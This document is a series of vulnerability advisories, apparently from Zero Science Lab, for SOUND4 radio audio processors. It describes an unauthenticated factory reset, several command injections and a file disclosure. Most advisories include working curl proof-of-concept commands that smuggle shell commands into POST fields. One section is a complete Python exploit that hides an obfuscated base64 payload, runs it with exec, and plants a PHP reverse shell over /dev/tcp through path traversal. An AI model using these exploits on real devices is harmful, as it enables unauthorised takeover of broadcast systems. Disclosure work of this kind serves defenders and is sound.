SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated factory reset vulnerability in restorefactory.cgi.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (restorefactory.cgi) Unauthenticated Factory ResetVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The device allows unauthenticated attackers to visit the unprotected/usr/cgi-bin/restorefactory.cgi endpoint and reset the device to its factorydefault configuration. Once a POST request is made, the device will rebootwith its default settings allowing the attacker to bypass authenticationand take full control of the system.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5742Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5742.php26.09.2022--> curl -kX POST "https://RADIO/cgi-bin/restorefactory.cgi" --data "0x539" \> sleep 120#login admin:admin

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Unauthenticated Factory Reset

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated remote code execution vulnerability in upload.cgi.

    #!/usr/bin/env python### SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution### Vendor: SOUND4 Ltd.# Product web page: https://www.sound4.com | https://www.sound4.biz# Affected version: FM/HD Radio Processing:#                   Impact/Pulse/First (Version 2: 1.1/2.15)#                   Impact/Pulse/First (Version 1: 2.1/1.69)#                   Impact/Pulse Eco 1.16#                   Voice Processing:#                   BigVoice4 1.2#                   BigVoice2 1.30#                   Web-Audio Streaming:#                   Stream 1.1/2.4.29#                   Watermarking:#                   WM2 (Kantar Media) 1.11## Summary: The SOUND4 IMPACT introduces an innovative process - mono and# stereo parts of the signal are processed separately to obtain perfect# consistency in terms of both sound and level. Therefore, in moving# reception, when the FM receiver switches from stereo to mono and back to# stereo, the sound variations and changes in level are reduced by over 90%.# In the SOUND4 IMPACT processing chain, the stereo expander can be used# substantially without any limitations.## With its advanced functionalities and impressive versatility, SOUND4# PULSE gives clients the ultimate price - performance ratio, providing# much more than just a processor. Flexible and powerful, it ensures perfect# sound quality and full compatibility with radio broadcasting standards# and can be used simultaneously for FM and HD, DAB, DRM or streaming.## SOUND4 FIRST provides all the most important functionalities you need# in an FM/HD processor and sets the bar high both in terms of performance# and affordability. Designed to deliver a sound of uncompromising quality,# this tool gives you 2-band processing, a digital stereo generator and an# IMPACT Clipper.## Desc: SOUND4 products suffer from an unauthenticated remote code execution# vulnerability. An attacker can exploit this vulnerability by abusing the# firmware upgrade/upload functionality, which contains a path traversal flaw.# This allows the attacker to arbitrarily write a malicious file to a location# on the system with www-data permissions, which can be executed to gain unauthorized# access.# ---------------------------------------------------------------------------# Starting handler on port 6161.# Writing callback file...# Connection from 192.168.1.137:58670# You got shell.# id# uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)# exit# *** Connection closed by remote host ***# ---------------------------------------------------------------------------## Tested on: Apache/2.4.25 (Unix)#            OpenSSL/1.0.2k#            PHP/7.1.1#            GNU/Linux 5.10.43 (armv7l)#            GNU/Linux 4.9.228 (armv7l)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2022-5741# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php### 26.09.2022##import ipaddress as irukandji#--        -----------------------------from time import sleep#----------        ----------------------------import threading#-----------------        ---------------------------import telnetlib#------------------        --------------------------import requests#--------------------        -------------------------import socket#-----------------------        ------------------------import base64#------------------------        -----------------------import time#---------------------------        ----------------------import sys#-----------------------------        ---------------------import re#-------------------------------        --------------------importer  = "Y2xhc3MgVmlkZW9LaWxsZWRUaGV"+        "SYWRpb1N0YXI6DQog"importer += "ICAgDQogICAgZGVmIF9faW5pdF9f"+        "KHNlbGYpOg0KICAg"importer += "ICAgICBzZWxmLnNlY3JldGFnZW50I"+        "D0gIkRqL09sZSIN"importer += "CiAgICAgICAgc2VsZi5wYXlsb2FkID"+        "0gTm9uZQ0KICAg"importer += "ICAgICBzZWxmLmRlcGxveSA9IE5vbmU"+        "NCiAgICAgICAg"importer += "c2VsZi5yaG9zdCA9IE5vbmUNCiAgICA"+        "gICAgc2VsZi5s"importer += "aG9zdCA9IE5vbmUNCiAgICAgICAgc2"+        "VsZi5scG9ydCA9"importer += "IE5vbmUNCg0KICAgIGRlZiB0aGVfY"+        "XJncyhzZWxmKToN"importer += "CiAgICAgICAgaWYgbGVuKHN5cy5h"+        "cmd2KSAhPSA0Og0K"importer += "ICAgICAgICAgICAgc2VsZi50aGV"+        "fdXNhZ2UoKQ0KICAg"importer += "ICAgICBlbHNlOg0KICAgICAgIC"+        "AgICAgc2VsZi5yaG9z"importer += "dCA9IHN5cy5hcmd2WzFdDQogI"+        "CAgICAgICAgICBzZWxm"importer += "Lmxob3N0ID0gc3lzLmFyZ3Zb"+        "Ml0NCiAgICAgICAgICAg"importer += "IHNlbGYubHBvcnQgPSBpbnQ"+        "oc3lzLmFyZ3ZbM10pDQog"importer += "ICAgICAgICAgICBpZiBub3"+        "QgImh0dHAiIGluIHNlbGYu"importer += "cmhvc3Q6DQogICAgICAgI"+        "CAgICAgICAgc2VsZi5yaG9z"importer += "dCA9ICJodHRwOi8ve30i"+        "LmZvcm1hdChzZWxmLnJob3N0"importer += "KQ0KDQogICAgZGVmIHR"+        "oZV91c2FnZShzZWxmKToNCiAg"importer += "ICAgICAgc2VsZi50aG"+        "Vfd2hhKCkNCiAgICAgICAgcHJp"importer += "bnQoIlVzYWdlOiBwe"+        "XRob24ge30gW3RhcmdldElQOnRh"importer += "cmdldFBPUlRdIFts"+        "aXN0ZW5JUF0gW2xpc3RlblBPUlRd"importer += "Ii5mb3JtYXQoc3l"+        "zLmFyZ3ZbMF0pKQ0KICAgICAgICBl"importer += "eGl0KDApDQoNCi"+        "AgICBkZWYgdGhlX3doYShzZWxmKToN"importer += "CiAgICAgICAgd"+        "Gl0bCA9ICIiIg0KICAgICAgICAgL1xf"importer += "X19fX18gIF9f"+        "DQogICAgICAgIC8tfiAgICAgLF5+IC8g"importer += "X19uDQogICA"+        "gICAgLyAsLS0teCAvXy4tIkwvX18sXFwN"importer += "CiAgICAgIC"+        "8tIi4tLS0uXF8uLScvISIgIFwgXFwNCiAg"importer += "ICAgIDBcL"+        "zBfX18vICAgeCcgLyAgICApIHwNCiAgICAg"importer += "IFwuX19f"+        "X19fLi0nXy57X18uLSJfLl4NCiAgICAgICBg"importer += "eF9fX18"+        "sLi0iLC1+KCAuLSINCiAgICAgICAgICBfLi18"importer += "ICxeLi"+        "1+ICJcXA0KICAgICBfXy4tfl8sLXwvXC8gICAg"importer += "IGBpD"+        "QogICAgLyB1Li1+IC4te1wvICAgICAuLV4tLS4N"importer += "CiAg"+        "ICBcLyAgIHZ+ICwtXnguX19fX30tLXIgfA0KICAg"importer += "ICAg"+        "ICAvIC8iICAgICAgICAgICAgfCB8DQogICAgICBf"importer += "L18vI"+        "CAgICAgICAgICAgICAhX2xfDQogICAgb35fLy8p"importer += "ICAgIC"+        "AgICAgICAgIChfXFxffm8NCn5+fn5+fn5+fn5+"importer += "fn5+fn5"+        "+fn5+fn5+fn5+fn5+fn5+fn4NCiAgICAgICAg"importer += "IiIiDQog"+        "ICAgICAgIHByaW50KHRpdGwpDQoNCiAgICBk"importer += "ZWYgdGhl"+        "X3VwbG9hZChzZWxmKToNCiAgICAgICAgcHJp"importer += "bnQoIldy"+        "aXRpbmcgY2FsbGJhY2sgZmlsZS4uLiIpDQog"importer += "ICAgICAg"+        "IHNlbGYuaGVhZGVycyA9IHsiQ29udGVudC1U"importer += "eXBlIiA6"+         "ICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3V"importer += "uZGFyeT0"+          "tLS0tVGhlTWVudSIsDQogICAgICAgICAgI"importer += "CAgICAgI"+            "CAgICAgICAiQWNjZXB0LUxhbmd1YWdlI"importer += "iA6ICJlb"+              "i1VUyxlbjtxPTAuOSIsDQogICAgICA"importer += "gICAgICA"+                "gICAgICAgICAgICAiQWNjZXB0LUV"importer += "uY29kaW5"+                  "nIiA6ICJnemlwLCBkZWZsYXRlI"importer += "iwNCiAgI"+                    "CAgICAgICAgICAgICAgICAgI"importer += "CAgICJVc"+                      "2VyLUFnZW50IiA6IHNlbGY"importer += "uc2VjcmV"+                        "0YWdlbnQsDQogICAgICA"importer += "gICAgICAg"+                       "ICAgICAgICAgICAiQ2Fj"importer += "aGUtQ29udH"+                      "JvbCIgOiAibWF4LWFnZT"importer += "0wIiwgDQogI"+                     "CAgICAgICAgICAgICAgI"importer += "CAgICAgICAiQ2"+                   "9ubmVjdGlvbiIgOiAiY2"importer += "xvc2UiLA0KICAgI"+                 "CAgICAgICAgICAgICAgI"importer += "CAgICAgIkFjY2VwdC"+               "IgOiAiKi8qIn0NCiAgIC"importer += "ANCiAgICAgICAgc2VsZ"+             "i5wYXlsb2FkID0gIjw/c"importer += "GhwIGV4ZWMoXCIvYmluL2"+          "Jhc2ggLWMgJ2Jhc2ggLWk"importer += "gPiAvZGV2L3RjcC8iK3Nlb"+        "GYubGhvc3QrIi8iK3N0cih"importer += "zZWxmLmxwb3J0KSsiIDwmM"+        "TtybSBiLnBocCdcIik7Ig0"importer += "KDQogICAgICAgIHNlbGYuZ"+        "GVwbG95ICA9ICItLS0tLS1"importer += "UaGVNZW51XHJcbkNvbnRlbn"+        "QtRGlzcG9zaXRpb246IGZ"importer += "vcm0tZGF0YTsiI3VzDQogICA"+        "gICAgIHNlbGYuZGVwbG9"importer += "5ICs9ICIgbmFtZT1cInVwZ2Zp"+        "bGVcIjsgZmlsZW5hbWU"importer += "9XCIuLi8uLi8uLi8uLi8uLi8uL"+        "i8iI01lDQogICAgICA"importer += "gIHNlbGYuZGVwbG95ICs9ICIuLi"+        "92YXIvd3d3L2IucGh"importer += "wXCJcclxuQ29udGVudC1UeXBlOiB"+        "hcHBsaWNhdGlvbi8"importer += "iI2NvDQogICAgICAgIHNlbGYuZGVw"+        "bG95ICs9ICJvY3R"importer += "ldC1zdHJlYW1cclxuXHJcbiIrc2VsZ"+        "i5wYXlsb2FkKyJ"importer += "cclxuLS0tLS0tVGgiIy4uDQogICAgIC"+        "AgIHNlbGYuZGV"importer += "wbG95ICs9ICJlTWVudVxyXG5Db250ZW5"+        "0LURpc3Bvc2l"importer += "0aW9uOiBmb3JtLWRhdGE7IG5hbWU9XCIi"+        "I24NCiAgICA"importer += "gICAgc2VsZi5kZXBsb3kgKz0gInN1Ym1pd"+        "FwiXHJcblx"importer += "yXG5EbyBpdFxyXG4tLS0tLS1UaGVNZW51LS"+        "1cclxuIiM"importer += "tLS0tLS0NCiAgICANCiAgICAgICAgcmVxdWV"+        "zdHMucG9"importer += "zdChzZWxmLnJob3N0KyIvY2dpLWJpbi91cGxv"+        "YWQuY2d"importer += "pIiwgaGVhZGVycz1zZWxmLmhlYWRlcnMsIGRhd"+        "GE9c2V"importer += "sZi5kZXBsb3kpDQogICAgICAgIHNsZWVwKDEpIC"+        "ANCiA"importer += "gICAgICAgcmVxdWVzdHMuZ2V0KHNlbGYucmhvc3Q"+        "rIi9"importer += "iLnBocCIpDQoNCiAgICBkZWYgdGhlX3N1YnAoc2Vs"+        "Zik"importer += "6DQogICAgICAgIGtvbmFjID0gdGhyZWFkaW5nLlRoc"+        "mV"importer += "hZChuYW1lPSJaU0wiLCB0YXJnZXQ9c2VsZi50aGVfZW"+        "F"importer += "yKQ0KICAgICAgICBrb25hYy5zdGFydCgpDQogICAgIC"+        "A"importer += "gIHNsZWVwKDEpDQogICAgICAgIHNlbGYudGhlX3VwbG"+        "9"importer += "hZCgpDQoNCiAgICBkZWYgdGhlX2VhcihzZWxmKToNC"+        "iA"importer += "gICAgICAgdGVsbmV0dXMgPSB0ZWxuZXRsaWIuVGVs"+        "bmV"importer += "0KCkNCiAgICAgICAgcHJpbnQoIlN0YXJ0aW5nIGh"+        "hbmR"importer += "sZXIgb24gcG9ydCB7fS4iLmZvcm1hdChzZWxmLm"+        "xwb3J"importer += "0KSkNCiAgICAgICAgcyA9IHNvY2tldC5zb2NrZ"+        "XQoc29"importer += "ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NU"+        "UkVBTSk"importer += "NCiAgICAgICAgcy5iaW5kKCgiMC4wLjAuMCI"+        "sIHNlbGY"importer += "ubHBvcnQpKQ0KICAgICAgICB3aGlsZSBUcn"+        "VlOg0KICA"importer += "gICAgICAgICAgdHJ5Og0KICAgICAgICAgI"+        "CAgICAgIHM"importer += "uc2V0dGltZW91dCg3KQ0KICAgICAgICAg"+        "ICAgICAgIHM"importer += "ubGlzdGVuKDEpDQogICAgICAgICAgICA"+        "gICAgY29ubiw"importer += "gYWRkciA9IHMuYWNjZXB0KCkNCiAgIC"+        "AgICAgICAgICA"importer += "gICBwcmludCgiQ29ubmVjdGlvbiBmc"+        "m9tIHt9Ont9Ii5"importer += "mb3JtYXQoYWRkclswXSwgYWRkclsx"+        "XSkpDQogICAgICA"importer += "gICAgICAgICAgdGVsbmV0dXMuc29"+        "jayA9IGNvbm4NCiA"importer += "gICAgICAgICAgIGV4Y2VwdCBzb2"+        "NrZXQudGltZW91dCB"importer += "hcyBwOg0KICAgICAgICAgICAgI"+        "CAgIHByaW50KCJIbW1"importer += "tICh7bXNnfSkiLmZvcm1hdCht"+        "c2c9cCkpDQogICAgICA"importer += "gICAgICAgICAgcy5jbG9zZSg"+        "pDQogICAgICAgICAgICA"importer += "gICAgZXhpdCgwKQ0KICAgIC"+        "AgICAgICAgYnJlYWsNCg0"importer += "KICAgICAgICBwcmludCgiW"+        "W91IGdvdCBzaGVsbC4iKQ0"importer += "KICAgICAgICB0ZWxuZXR1"+        "cy5pbnRlcmFjdCgpDQogICA"importer += "gICAgIGNvbm4uY2xvc2U"+        "oKQ0KDQogICAgZGVmIG1haW4"importer += "oc2VsZik6DQogICAgIC"+        "AgIHNlbGYudGhlX2FyZ3MoKQ0"importer += "KICAgICAgICBzZWxmL"+        "nRoZV9zdWJwKCkNCg0KaWYgX19"importer += "uYW1lX18gPT0gJ19f"+        "bWFpbl9fJzoNCiAgICBWaWRlb0t"importer += "pbGxlZFRoZVJhZGl"+        "vU3RhcigpLm1haW4oKQ0K"######"retropmi  = "U2VjdXJpdHkgaXM"+        "gbGlrZSBhbiBvbmlvbjogdGhlIG1v"retropmi += "cmUgbGF5ZXJzIH"+        "lvdSBwZWVsLCB0aGUgbW9yZSBpdCBz"retropmi += "dGlua3Mu"####"+        "###############################"radio_code = base64.b64decode(importer)curves = [ord(c) for c in retropmi]maxi = max(curves)mini = min(curves)code_range = maxi - minijcoords = [int(20 * (1 - (codeio - mini) / code_range)) for codeio in curves]for y in range(20, 0, -1):    line = ""    for x in range(len(jcoords)):        if jcoords[x] >= y:            line += "-"        else:            line += " "    print(line)    time.sleep(0.03/1.337)exec(radio_code)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x upload.cgi Code Execution

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a conditional command injection vulnerability in traceroute.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .traceroute.pid, and the commands inthe file can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/traceroute.php:------------------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5740Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.traceroute.pid#External> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x traceroute.php Conditional Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username related unauthenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Unauthenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated OS command injectionvulnerability. This can be exploited to inject and execute arbitrary shellcommands through the 'username' HTTP POST parameter through index.php andlogin.php script.========================================================================/var/www/login.php:-------------------09: if (isset($_POST['username']) && isset($_POST['password'])) {10:11:    $ret = -1;12:    // remarque: Check Password for broken, only admin/admin as valid user/password13:    exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5739Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5739.php26.09.2022--> curl --fail -XPOST -sko nul https://RADIOGAGA/index.php --data "username=`id>/var/www/j`&password=ZSL" && curl -sk https://RADIOGAGA/juid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password related unauthenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Unauthenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated OS command injectionvulnerability. This can be exploited to inject and execute arbitrary shellcommands through the 'password' HTTP POST parameter through index.php andlogin.php script.========================================================================/var/www/login.php:-------------------09: if (isset($_POST['username']) && isset($_POST['password'])) {10:11:    $ret = -1;12:    // remarque: Check Password for broken, only admin/admin as valid user/password13:    exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5738Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php26.09.2022--> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/guid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x password Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a services related authenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (services) Authenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: An authenticated command injection vulnerability exists in thewww-data-handler.php script at line 20, where the 'services' HTTP POSTparameter is passed as an argument to the system command "/usr/local/bin/www-data-handler.sh --restartsrv".This allows an attacker to inject arbitrary system commands into the'services' parameter, which are then executed by the script with theprivileges of the 'www-data' user.========================================================================/var/www/www-data-handler.php:------------------------------18: } else if(isset($_POST['services'])&&$_POST['services']!='') {19:     $ret=-1;20:     exec("/usr/local/bin/www-data-handler.sh --restartsrv ".$_POST['services'],$out,$ret);21:     echo $ret;22:     exit;23: }========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5737Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5737.php26.09.2022--> curl --fail -XPOST -sko nul \       'https://RADIOGUGA/www-data-handler.php' \       -H 'Cookie: PHPSESSID=fnlqhsd916g59uob4fgact97bd' \       --data "services=;id>/var/www/m" \       && curl -sk 'https://RADIOGUGA/m'uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x services Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco version 2.x and below suffer from an unauthenticated file disclosure vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File DisclosureVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated file disclosurevulnerability. Using the 'file' GET parameter attackers can disclosearbitrary files on the affected device and disclose sensitive and systeminformation.========================================================================/usr/cgi-bin/loghandler.php:----------------------------05: require 'phptail.php';06: /**07:  * Initilize a new instance of PHPTail08:  * @var PHPTail09:  */10: if(isset($_GET['file']))  {11:     $file=$_GET['file'];12:     $file_display=$_GET['file_display'];13: } else {14:     $file=getenv("PATH_TRANSLATED");15:     $file_display="SOUND4 Log: " . getenv("PATH_INFO");16: }17: $tail = new PHPTail($file, $file_display);========================================================================/usr/cgi-bin/phptail.php:-------------------------71: $data = array();72: if($maxLength > 0) {73:74:     $fp = fopen($this->log, 'r');75:     fseek($fp, -$maxLength , SEEK_END);76:     $data = explode("\n", fread($fp, $maxLength));77:78: }79: /**80:  * If the last entry in the array is an empty string lets remove it.81:  */82: if(end($data) == "") {83:     array_pop($data);84: }85: return json_encode(array("size" => $fsize, "data" => $data));========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           